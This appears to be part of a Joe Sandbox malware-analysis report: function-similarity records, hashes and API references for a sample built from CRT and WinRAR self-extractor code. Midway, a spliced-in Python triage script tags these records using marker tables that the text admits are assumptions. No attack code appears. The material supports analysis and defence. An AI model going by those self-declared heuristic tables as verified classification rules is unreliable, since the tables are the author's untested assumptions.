                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$HandleModule
                                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                        • API String ID: 667068680-1718035505
                                                        • Opcode ID: 1444f5c98b94489216eec6f642ec7402f856da51c0bc558bc27b28571981de2b
                                                        • Instruction ID: ecb3bc7b70ec134e664bfadc9e9564ed7e0e1b08b35faa2b0cc634a43d96562a
                                                        • Opcode Fuzzy Hash: 1444f5c98b94489216eec6f642ec7402f856da51c0bc558bc27b28571981de2b
                                                        • Instruction Fuzzy Hash: 18111C20B0EB0A83FF65AF03E9D0274B2917F58790FD95435CB6D467D0EE6CA49482E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: abort$CallEncodePointerTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 2889003569-2084237596
                                                        • Opcode ID: 3a5394c8939429c7767624c95706d80dee7fb934122ce78df2451405f585be14
                                                        • Instruction ID: 94d73f5aacae97b5fbd4fd8291ce40cfd4876afb6bdfec7b56468645fe6ace3d
                                                        • Opcode Fuzzy Hash: 3a5394c8939429c7767624c95706d80dee7fb934122ce78df2451405f585be14
                                                        • Instruction Fuzzy Hash: 5791A073A08B858AE711DF66E8802ADBBA0FB04788F50413AEF9D17795DF38D195C740
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 2e68525bcb123b69dd3695be73262e4bf93529d5699b69db2b9257dd34a89159
                                                        • Instruction ID: a5c7f092107c88fb579a20cab9eebbf4ed06cc69f6d2b663e439e6533a202f0e
                                                        • Opcode Fuzzy Hash: 2e68525bcb123b69dd3695be73262e4bf93529d5699b69db2b9257dd34a89159
                                                        • Instruction Fuzzy Hash: 7151A632A0960287DB54EF16E484A39B7A5FB44B98F908571EF2E477C8DF38E841C790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Window$Show$Rect
                                                        • String ID: RarHtmlClassName
                                                        • API String ID: 2396740005-1658105358
                                                        • Opcode ID: 0f7adb0d42835859a445fc98434de89ffe80b21d0821b8be92ccf7b9d4423bc4
                                                        • Instruction ID: 87f2e2d4e003f6e136bb4fa7b096c9acc66acbe0c748273cb46d66fb2b3f63f5
                                                        • Opcode Fuzzy Hash: 0f7adb0d42835859a445fc98434de89ffe80b21d0821b8be92ccf7b9d4423bc4
                                                        • Instruction Fuzzy Hash: CC517236A197828BEB24AF27E49437AF3A0FB85784F840135DB9A42795DF3CE0458790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RENAMEDLG$REPLACEFILEDLG
                                                        • API String ID: 0-56093855
                                                        • Opcode ID: 7c8508dbb91623a7f3c2788d42bb5db1e901b31236c0c63f0cf5ebf64345d783
                                                        • Instruction ID: 71ef72faab57aa03e2d5e610a34bb88b9611b9031e1d852d5a49ad77a7c4168f
                                                        • Opcode Fuzzy Hash: 7c8508dbb91623a7f3c2788d42bb5db1e901b31236c0c63f0cf5ebf64345d783
                                                        • Instruction Fuzzy Hash: 7C21D861919A4782EB24AF1BF8C8274F7A0BB45B84F984436CB6D473E4DE3DE15583E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 41ead686425019c1775ba5e3bb7265ff4caf85c1dac70b8825e828e77bbff3ee
                                                        • Instruction ID: 86014fe641d2e0b9f39c893afdc975fbe8ca7dc5645ee9cf5833d9cddd17250b
                                                        • Opcode Fuzzy Hash: 41ead686425019c1775ba5e3bb7265ff4caf85c1dac70b8825e828e77bbff3ee
                                                        • Instruction Fuzzy Hash: 63F03122A1974682EF44AF16E8C4379B361BFC8B90F85103ADB5F866A4DE2CD444C650
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%
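The function records above are dominated by two kinds of boilerplate: MSVC CRT helpers (the "api-ms-" API-set loader, the CorExitProcess/mscoree.dll exit path, the SRWLock bootstrap) and strings that belong to a WinRAR self-extractor stub (RarHtmlClassName, RENAMEDLG, REPLACEFILEDLG, the .zipx/.zx volume naming). When triaging a report like this, the useful step is to parse these records, tag the known-library functions, and keep only what is left for manual review. The script below is an added example written for this page, not Joe Sandbox code or output; the record layout it parses is modelled on the "Similarity" blocks above, the sample text is constructed from four of those records, and the two marker tables are the author's own assumptions about which strings indicate CRT and WinRAR SFX code.

```python
"""Triage Joe Sandbox function-similarity records by string markers.

Added example for this report. The marker tables and the treatment of
the "-1.00%" uniqueness placeholder are assumptions, not Joe Sandbox
semantics.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Constructed sample: four records in the layout of the blocks above.
SAMPLE = """\
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• Instruction Fuzzy Hash: 5F315C21A1FA4692EB15BF43E880675B394BF45BA4FDA0535DE6D4A3D1DF3CE44082A0
Uniqueness Score: -1.00%
• API ID: Window$Show$Rect
• String ID: RarHtmlClassName
• Instruction Fuzzy Hash: CC517236A197828BEB24AF27E49437AF3A0FB85784F840135DB9A42795DF3CE0458790
Uniqueness Score: -1.00%
• API ID:
• String ID: RENAMEDLG$REPLACEFILEDLG
• Instruction Fuzzy Hash: 7C21D861919A4782EB24AF1BF8C8274F7A0BB45B84F984436CB6D473E4DE3DE15583E0
Uniqueness Score: -1.00%
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• Instruction Fuzzy Hash: 63F03122A1974682EF44AF16E8C4379B361BFC8B90F85103ADB5F866A4DE2CD444C650
Uniqueness Score: -1.00%
"""

# Assumption: the report joins several strings of one function with '$'.
STRING_SEP = "$"

# Assumption: strings emitted by the MSVC CRT API-set loader, exit path and
# lock bootstrap. Matching them de-prioritises boilerplate; it is not
# evidence that the function is harmless.
MSVC_CRT_MARKERS = {"api-ms-", "mscoree.dll", "CorExitProcess",
                    "AcquireSRWLockExclusive", "ReleaseSRWLockExclusive"}

# Assumption: dialog resource names and volume-naming strings of the
# WinRAR self-extractor stub.
WINRAR_SFX_MARKERS = {"RarHtmlClassName", "RENAMEDLG", "REPLACEFILEDLG",
                      ".zipx", ".zx", "z%s%02d"}

FIELD_RE = re.compile(
    r"^\s*•?\s*(API ID|String ID|Instruction Fuzzy Hash|Uniqueness Score):\s*(.*)$")


@dataclass
class FunctionRecord:
    api_id: str
    strings: list
    fuzzy_hash: str
    uniqueness: Optional[float]  # None when the report shows the -1.00% placeholder


def parse_records(text: str) -> list:
    """Split report text into records; 'Uniqueness Score' closes a record."""
    records, cur = [], {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group(1), m.group(2).strip()
        cur[key] = value
        if key == "Uniqueness Score":
            pct = float(value.rstrip("%"))
            records.append(FunctionRecord(
                api_id=cur.get("API ID", ""),
                strings=[s for s in cur.get("String ID", "").split(STRING_SEP) if s],
                fuzzy_hash=cur.get("Instruction Fuzzy Hash", ""),
                uniqueness=None if pct < 0 else pct,  # assumption: negative = not computed
            ))
            cur = {}
    return records


def classify(rec: FunctionRecord) -> str:
    """Tag a record as WinRAR SFX stub, MSVC CRT boilerplate, or unclassified."""
    found = set(rec.strings)
    if found & WINRAR_SFX_MARKERS:
        return "winrar-sfx"
    if found & MSVC_CRT_MARKERS:
        return "msvc-crt"
    return "unclassified"


def summarize(records) -> Counter:
    return Counter(classify(r) for r in records)


def boilerplate_hashes(records) -> set:
    """Fuzzy hashes of CRT functions, reusable as a skip-list on later reports."""
    return {r.fuzzy_hash for r in records if classify(r) == "msvc-crt"}


def filter_known(records, known_hashes) -> list:
    """Drop records whose fuzzy hash is already on the skip-list."""
    return [r for r in records if r.fuzzy_hash not in known_hashes]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(dict(summarize(recs)))
    for r in filter_known(recs, boilerplate_hashes(recs)):
        print(classify(r), r.api_id or "<no API>", r.strings)
```

The skip-list built from `boilerplate_hashes` is the part worth keeping across reports: once the CRT functions of one build have been tagged, the same fuzzy hashes recur in every sample linked against that CRT, and filtering them out leaves the unpacker and payload logic as the residue to read by hand.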

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 3215553584-0
                                                        • Opcode ID: c548ac832c78b92ec1d923a8916f7dc2217aa72c2b6758b80a72ecf6dff91f0c
                                                        • Instruction ID: 8a4b494d68329a4ff25be2de5c2e9f869c9aede5ff821588a7c911f6fbfcb903
                                                        • Opcode Fuzzy Hash: c548ac832c78b92ec1d923a8916f7dc2217aa72c2b6758b80a72ecf6dff91f0c
                                                        • Instruction Fuzzy Hash: FB818B22B1861686F720AF67DCC06BDB6A4BB44B98F844135DB2E976D5DF38E441C3A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 2398171386-0
                                                        • Opcode ID: acb60da309b2253dc5e9679f966fb61d554592a31164629a9f133004a7ff1bc3
                                                        • Instruction ID: 238ed82ecaeb1a63c68d0a6c577fb5d577de2e3d0ecb03030ea113cf046032fb
                                                        • Opcode Fuzzy Hash: acb60da309b2253dc5e9679f966fb61d554592a31164629a9f133004a7ff1bc3
                                                        • Instruction Fuzzy Hash: 8351D432B18B06AAFB50EF66E8903BDB361AB44798F804635DF3D466D5DF3890958390
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                        • String ID:
                                                        • API String ID: 3659116390-0
                                                        • Opcode ID: 1cd0471f1fa0ba39e6c89e085235cb16163e43b2f139bc396a7cde33f0681fd1
                                                        • Instruction ID: fa11ac0f3c6d421d33133c8d70f3ae7282aea603d7839c0ab9bc241d55131137
                                                        • Opcode Fuzzy Hash: 1cd0471f1fa0ba39e6c89e085235cb16163e43b2f139bc396a7cde33f0681fd1
                                                        • Instruction Fuzzy Hash: 4151AF32A18A51C6E790DF66D8843ACBBB0FB44B98F448135DF6E87699DF38D141C760
                                                        Similarity
                                                        • API ID: AddressProc
                                                        • String ID:
                                                        • API String ID: 190572456-0
                                                        • Opcode ID: 9cab2cbaf794975dd84f68dd969880afa2df4031812d8fe62cc01396f3b1aa86
                                                        • Instruction ID: 468e2597236d29ff2a2607280070c31a8456f279e00925c7f67df6bfd1007872
                                                        • Opcode Fuzzy Hash: 9cab2cbaf794975dd84f68dd969880afa2df4031812d8fe62cc01396f3b1aa86
                                                        • Instruction Fuzzy Hash: 9741C262B0A64593FF15BF43EC845B5B291BB15BE0F894939DE6D8B7C4DE3CE04082A0
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                        • Instruction ID: cea57cd310e6ac6b471ca9477cf65fbbd845b3c5560f9f5119aabc406c113f1a
                                                        • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                        • Instruction Fuzzy Hash: 43116062E3C60743FB583D36ECC13B9B1416F547A5F884634F77EC66D68E2CA44942A0
                                                        Similarity
                                                        • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                        • String ID:
                                                        • API String ID: 3621893840-0
                                                        • Opcode ID: 8b097f18887cb1e3026db83f2a8d48409f38768177490a167cdc872345ad7a60
                                                        • Instruction ID: 563afa423d2069a14815b56a5888b2e29a0ce976a5fc22ad4758fc914858d5df
                                                        • Opcode Fuzzy Hash: 8b097f18887cb1e3026db83f2a8d48409f38768177490a167cdc872345ad7a60
                                                        • Instruction Fuzzy Hash: 67F04F62B2854683F760AF62E895BBAB251FFA4B05FC45030D75E418D49E2CD449C7A0
                                                        Similarity
                                                        • API ID: __except_validate_context_recordabort
                                                        • String ID: csm$csm
                                                        • API String ID: 746414643-3733052814
                                                        • Opcode ID: be506e55bd76a4fc1cc33cd602a9f02af468dc5fce4ddee28aa73968aa2bf590
                                                        • Instruction ID: 7ef5c6756a7d1f7b8c163e7375bbf7041c8cf96bb7aeabd3e10ca0f77b9a9740
                                                        • Opcode Fuzzy Hash: be506e55bd76a4fc1cc33cd602a9f02af468dc5fce4ddee28aa73968aa2bf590
                                                        • Instruction Fuzzy Hash: 9371B1729086828BDB61AF26D4C077DBBA0FB01B8AF848176DB9D57AC5CB2CD451C790
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: $*
                                                        • API String ID: 3215553584-3982473090
                                                        • Opcode ID: 657f2f9f8f19e07b651cb89ce54e29715672433403af4f6c8af21786d19ec375
                                                        • Instruction ID: 2480815c11e95ec307d3aab52a89db8a08b388dd471feecd45acb107ae483ca2
                                                        • Opcode Fuzzy Hash: 657f2f9f8f19e07b651cb89ce54e29715672433403af4f6c8af21786d19ec375
                                                        • Instruction Fuzzy Hash: 9551A672D0E6428BE765AE36C0C637CBBA0FB05B18F951135E76A492D5CF28D481CBA1
                                                        Similarity
                                                        • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                        • String ID: csm
                                                        • API String ID: 2466640111-1018135373
                                                        • Opcode ID: 3b2257290adfa2781d5b09c2d1616d864f17ca53d9f431228db0fbfec44e584e
                                                        • Instruction ID: 47935996be43f89713c155a924e88f634ba27dc2a1c8a28ac67f458d878a7763
                                                        • Opcode Fuzzy Hash: 3b2257290adfa2781d5b09c2d1616d864f17ca53d9f431228db0fbfec44e584e
                                                        • Instruction Fuzzy Hash: AF51363661974687E720EF16E58027EB7A4FB88B94F400135EB9D07B96DF38E460CB90
                                                        Similarity
                                                        • API ID: ByteCharErrorFileLastMultiWideWrite
                                                        • String ID: U
                                                        • API String ID: 2456169464-4171548499
                                                        • Opcode ID: 2f706e73b6f803897afdeedd5c6f9beaf88812da98874b118221d5eca08fcff9
                                                        • Instruction ID: e74f7557083efb29907bb21cc2dbf0d8ca67ef2ea23c98c3c4a6c017b50e4ee0
                                                        • Opcode Fuzzy Hash: 2f706e73b6f803897afdeedd5c6f9beaf88812da98874b118221d5eca08fcff9
                                                        • Instruction Fuzzy Hash: 4041A022B19A45D2EB20AF26E8843B9B7A1FB88794F814135EF5D87788DF3CD441C790
                                                        Similarity
                                                        • API ID: ObjectRelease
                                                        • String ID:
                                                        • API String ID: 1429681911-3916222277
                                                        • Opcode ID: 44c77fb0c881ba99751d99cab6f2a4cb2265e5a1d1bd1f8fbaa2d73aad56a42c
                                                        • Instruction ID: 7b5e278ff3f1689e5511a6d2ecef071bf9a5efbdc5f4a579f1ca74294effa4ce
                                                        • Opcode Fuzzy Hash: 44c77fb0c881ba99751d99cab6f2a4cb2265e5a1d1bd1f8fbaa2d73aad56a42c
                                                        • Instruction Fuzzy Hash: B531283671874187DB149F23F84876AB6A1F788FD1F504139EF9A43B94DE3CD0498A80
                                                        Similarity
                                                        • API ID: CapsDeviceRelease
                                                        • String ID:
                                                        • API String ID: 127614599-3916222277
                                                        • Opcode ID: f39d4aaa32b0f0035c213a3f2668141cc8a749a99fd2638b01b0a4ed9b2b3d7d
                                                        • Instruction ID: 4918b38faaacd8d3ccf592b18e5cac8cd717995c866e6090ced47ba4df827b47
                                                        • Opcode Fuzzy Hash: f39d4aaa32b0f0035c213a3f2668141cc8a749a99fd2638b01b0a4ed9b2b3d7d
                                                        • Instruction Fuzzy Hash: CFE08C21B0864183EB686BB6F5C912AA2A1AB4CBD0F954039DB1E837C4ED3DC4854380
                                                        Similarity
                                                        • API ID: FoldString_invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 2025052027-0
                                                        • Opcode ID: 288d887226528570286da00368890b9c12e33c721ffc9314224fe1766da8ebad
                                                        • Instruction ID: 29345971f6cdde9a852a3157f0b289fc09db2ae4330e28c8fcaba35c9dc5feae
                                                        • Opcode Fuzzy Hash: 288d887226528570286da00368890b9c12e33c721ffc9314224fe1766da8ebad
                                                        • Instruction Fuzzy Hash: B4B1D122F28A4AE2EB10AF5BD494569B3A1FB45B94F908131DB2D077D0DF7CE484C3A0
                                                        Similarity
                                                        • API ID: ErrorLast
                                                        • String ID:
                                                        • API String ID: 1452528299-0
                                                        • Opcode ID: 008e9068468195d1ad8d288de58e97b834aaa93408792d802f4b4f6273b3b4d6
                                                        • Instruction ID: 9adf2b0dcddb1af80bdfbd5016a9ba0557140771b06da190ab8f61882cb65565
                                                        • Opcode Fuzzy Hash: 008e9068468195d1ad8d288de58e97b834aaa93408792d802f4b4f6273b3b4d6
                                                        • Instruction Fuzzy Hash: 6551B362B14E46A6EB00BF26D4852EC7321FB85B88F804135DB6C577DAEE2CE541C3A0
                                                        Similarity
                                                        • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                        • String ID:
                                                        • API String ID: 1077098981-0
                                                        • Opcode ID: ca84554f8b83525ab0a772656818ef73ccc777e3a16219d34c0a377584f1fe82
                                                        • Instruction ID: 9359d9ca78b841ff1e286738475666655fa98243455614459a87cc411475863d
                                                        • Opcode Fuzzy Hash: ca84554f8b83525ab0a772656818ef73ccc777e3a16219d34c0a377584f1fe82
                                                        • Instruction Fuzzy Hash: DD516232728B4287E750AF22E4847AEB3A4FB95B84F901135DB5E57A98DF3CD504CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                        • String ID:
                                                        • API String ID: 4141327611-0
                                                        • Opcode ID: 121a64c51188f3446642135f8cc11aca021b0cf9c3d40bc74ea66e71a3f826c1
                                                        • Instruction ID: 2e2bfcdee5d258a897401c7665f4f01ced0112a4155ea0bb4f18d9553ba046a2
                                                        • Opcode Fuzzy Hash: 121a64c51188f3446642135f8cc11aca021b0cf9c3d40bc74ea66e71a3f826c1
                                                        • Instruction Fuzzy Hash: B241A221B0979257FB61AE13E88037DF294EF40B94F944130DBAC96AD6DF3ED84186A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7F4D8F8FB), ref: 00007FF7F4D93FE1
                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7F4D8F8FB), ref: 00007FF7F4D94043
                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7F4D8F8FB), ref: 00007FF7F4D9407D
                                                        • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7F4D8F8FB), ref: 00007FF7F4D940A7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
